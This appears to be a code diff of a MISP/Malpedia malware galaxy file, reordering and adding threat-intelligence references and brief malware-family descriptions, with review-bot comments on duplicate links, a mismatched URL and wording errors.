"https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf"
],
"synonyms": [
@@ -12203,11 +12937,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anel",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/",
"https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf"
],
"synonyms": [
"UPPERCUT",
@@ -12215,15 +12949,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "588b97ff-3434-4aa1-a5fd-815e1bb0178b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7",
"value": "Anel"
},
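Review bot: third `related` block removed in this diff (dest `588b97ff-3434-4aa1-a5fd-815e1bb0178b`); since all three removals have the identical `similar` / `almost-certain` shape, this looks like the generator no longer emitting the field rather than three deliberate edits. The commit message should say which it is, and if the relationships are still wanted they should be regenerated rather than dropped.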
@@ -12260,10 +12985,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis",
- "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/",
"https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/",
- "https://twitter.com/MsftSecIntel/status/1298752223321546754"
+ "https://twitter.com/MsftSecIntel/status/1298752223321546754",
+ "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/",
+ "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/"
],
"synonyms": [
"Anubis Stealer"
@@ -12279,10 +13004,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis_loader",
"https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/",
+ "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e",
"https://www.zerofox.com/blog/quick-update-kraken-completes-its-rebrand-to-anubis/",
- "https://windowsreport.com/kraken-botnet/",
"https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/",
- "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e"
+ "https://windowsreport.com/kraken-botnet/"
],
"synonyms": [
"Kraken",
@@ -12293,6 +13018,19 @@
"uuid": "e65ca164-f448-4f8e-a672-3ff7ec37e191",
"value": "Anubis Loader"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif",
+ "https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "573eb306-f6c7-4ba9-91a9-881473d335b8",
+ "value": "APERETIF"
+ },
{
"description": "",
"meta": {
@@ -12319,16 +13057,30 @@
"uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96",
"value": "Apocalypse"
},
+ {
+ "description": "This is an implant usable with the Mythic C2 framework. Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed to be used in SpecterOps training offerings.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apollo",
+ "https://github.com/MythicAgents/Apollo"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f995662c-27ad-440b-97ce-f1ecd2b59221",
+ "value": "Apollo"
+ },
{
"description": "Malware used by suspected Iranian threat actor Agrius, turned from wiper into ransomware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle",
- "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/",
- "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/",
+ "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/",
+ "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf",
"https://assets.sentinelone.com/sentinellabs/evol-agrius",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf"
+ "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/",
+ "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/"
],
"synonyms": [],
"type": []
@@ -12341,17 +13093,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
- "https://www.telsy.com/download/5394/?uid=28b0a4577e",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c",
- "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html",
+ "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
+ "https://www.telsy.com/download/5394/?uid=28b0a4577e",
+ "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
"https://twitter.com/VK_Intel/status/1182730637016481793"
],
"synonyms": [],
@@ -12365,22 +13120,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed",
- "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
- "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
"https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
- "https://www.youtube.com/watch?v=Dv2_DK3tRgI",
- "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
- "https://www.telsy.com/download/5654/?uid=4869868efd",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
"https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/",
- "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf",
- "https://asec.ahnlab.com/en/30532/",
+ "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
+ "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
"https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
"https://asec.ahnlab.com/ko/26705/",
- "https://asec.ahnlab.com/ko/36918/"
+ "https://asec.ahnlab.com/en/36368/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf",
+ "https://www.telsy.com/download/5654/?uid=4869868efd",
+ "https://asec.ahnlab.com/en/30532/",
+ "https://asec.ahnlab.com/ko/36918/",
+ "https://asec.ahnlab.com/en/41015/",
+ "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.youtube.com/watch?v=Dv2_DK3tRgI"
],
"synonyms": [
"JamBog"
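Review bot: the kept context line `"https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf"` pairs attach_file_seq 2651 with file id EpF2652, while the same list carries seq=2652/EpF2652 and (re-added) seq=2651/EpF2651; the mismatched URL looks like a typo variant of one of the other two and should be corrected or dropped instead of carried forward. Beyond that, this hunk only reshuffles the existing refs into a new, non-alphabetical order; the genuine additions are `https://asec.ahnlab.com/en/36368/` and `https://asec.ahnlab.com/en/41015/`. Emitting refs in a stable sorted order from the generator would keep future diffs down to the real additions.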
@@ -12395,8 +13152,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax",
- "https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf"
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576"
],
"synonyms": [],
"type": []
@@ -12431,12 +13188,30 @@
"uuid": "a711ad02-0120-41a1-8c03-8a857a7dc297",
"value": "Ares (Windows)"
},
+ {
+ "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums “RAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader",
+ "https://intel471.com/blog/new-loader-on-the-bloc-aresloader",
+ "https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html",
+ "https://flashpoint.io/blog/private-malware-for-sale-aresloader/",
+ "https://twitter.com/k3dg3/status/1636873721200746496",
+ "https://www.zerofox.com/blog/the-underground-economist-volume-2-issue-24/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1bd6c2ab-341e-43e1-90ca-2e7509828268",
+ "value": "AresLoader"
+ },
{
"description": "During a campaign against a Ukrainian energy provider, a new loader of a new version of CaddyWiper called \"ArguePatch\" was observed by ESET researchers. ArguePatch is a modified version of Hex-Ray's Remote Debugger Server (win32_remote.exe).\r\nArguePatch expects a decryption key and the file of the CaddyWiper shellcode as command line parameters.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.arguepatch",
- "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/"
+ "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions"
],
"synonyms": [],
"type": []
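Review bot: the new AresLoader description has unbalanced and mixed quoting: `“RAMP and \"XSS\"` opens a typographic quote on RAMP that is never closed while the rest of the sentence uses escaped ASCII quotes, and "Furthermore, It was observed" capitalises mid-sentence. The sentence "This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub" also does not parse; "This is because a similar project ... was previously uploaded" reads correctly. Normalising all quotes to `\"` and fixing those two sentences before merge would avoid shipping the text as-is into every MISP instance that pulls the galaxy.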
@@ -12450,9 +13225,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody",
"https://medium.com/insomniacs/aria-body-loader-is-that-you-53bdd630f8a1",
+ "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
"https://securelist.com/it-threat-evolution-q2-2020/98230",
- "https://securelist.com/naikons-aria/96899/",
- "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/"
+ "https://securelist.com/naikons-aria/96899/"
],
"synonyms": [],
"type": []
@@ -12466,6 +13241,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.aridgopher",
"https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks",
"https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/"
],
"synonyms": [],
@@ -12507,14 +13283,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer",
- "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
+ "https://isc.sans.edu/diary/rss/28468",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
"https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.minerva-labs.com/a-long-list-of-arkei-stealers-browser-crypto-wallets",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://threatmon.io/arkei-stealer-analysis-threatmon/",
"https://forensicitguy.github.io/analyzing-stealer-msi-using-msitools/",
"https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/",
- "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://isc.sans.edu/diary/rss/28468"
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
+ "https://blog.minerva-labs.com/a-long-list-of-arkei-stealers-browser-crypto-wallets",
+ "https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view"
],
"synonyms": [
"ArkeiStealer"
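Review bot: two of the added refs point at the same SANS ISC diary, `https://isc.sans.edu/diary/rss/28468` and `https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468`; keeping only the titled one would remove the duplicate. The added `https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view` is an opaque share link with no indication of author or title and can be revoked at any time; if the document has a canonical publication URL it should be cited instead, otherwise an archived copy would be more durable for a reference list.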
@@ -12524,13 +13304,26 @@
"uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6",
"value": "Arkei Stealer"
},
+ {
+ "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat",
+ "https://www.arrowrat.com"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3d5608dc-1e0d-40cb-8a17-3a8d7efb1c53",
+ "value": "ArrowRAT"
+ },
{
"description": "ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader",
- "https://twitter.com/Racco42/status/1001374490339790849",
"https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/",
+ "https://twitter.com/Racco42/status/1001374490339790849",
"https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/"
],
"synonyms": [],
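Review bot: the ArrowRAT description opens with an unnamed "It is available as a service" and contains "It’s features", which should read "Its features"; starting the text with "ArrowRAT is ..." would make the entry self-describing when displayed outside the cluster. The only reference besides the Malpedia page is the tool's own sales site, `https://www.arrowrat.com`, which can change or disappear; an archived snapshot or a third-party analysis (if one exists) would be a more stable citation.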
@@ -12558,13 +13351,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.artra",
- "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english",
"https://www.freebuf.com/articles/database/192726.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
"https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
+ "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english",
+ "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [],
"type": []
@@ -12615,8 +13408,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox",
"https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign",
- "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/",
- "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/"
+ "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/",
+ "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/"
],
"synonyms": [
"Aseljo",
@@ -12632,8 +13425,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/",
- "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/"
],
"synonyms": [],
"type": []
@@ -12646,21 +13439,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
- "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/",
- "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research",
- "https://blog.easysol.net/meet-lucifer-international-trojan/",
- "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/",
- "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/",
- "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/",
"https://blog.talosintelligence.com/2020/05/astaroth-analysis.html",
- "https://isc.sans.edu/diary/27482",
- "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt",
"https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
- "https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/"
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
+ "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/",
+ "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/",
+ "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/",
+ "https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962",
+ "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/",
+ "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt",
+ "https://blog.easysol.net/meet-lucifer-international-trojan/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://isc.sans.edu/diary/27482",
+ "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/"
],
"synonyms": [
"Guildma"
@@ -12675,10 +13468,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker",
- "https://www.emsisoft.com/ransomware-decryption-tools/astralocker",
"https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/",
+ "https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs",
"https://blog.malwarebytes.com/ransomware/2022/07/astralocker-2-0-ransomware-isnt-going-to-give-you-your-files-back/",
- "https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs"
+ "https://www.emsisoft.com/ransomware-decryption-tools/astralocker"
],
"synonyms": [],
"type": []
@@ -12691,77 +13484,90 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat",
- "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://community.riskiq.com/article/3929ede0/description",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign",
"https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://eln0ty.github.io/malware%20analysis/asyncRAT/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware",
"https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://community.riskiq.com/article/ade260c6",
- "https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://blog.netlab.360.com/purecrypter",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
- "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
- "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/",
- "https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser",
- "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html",
- "https://twitter.com/ESETresearch/status/1449132020613922828",
- "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader",
- "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
- "https://labs.k7computing.com/?p=21759",
+ "https://community.riskiq.com/article/24759ad2",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware",
+ "https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/",
+ "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
+ "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia",
+ "https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/#",
"https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
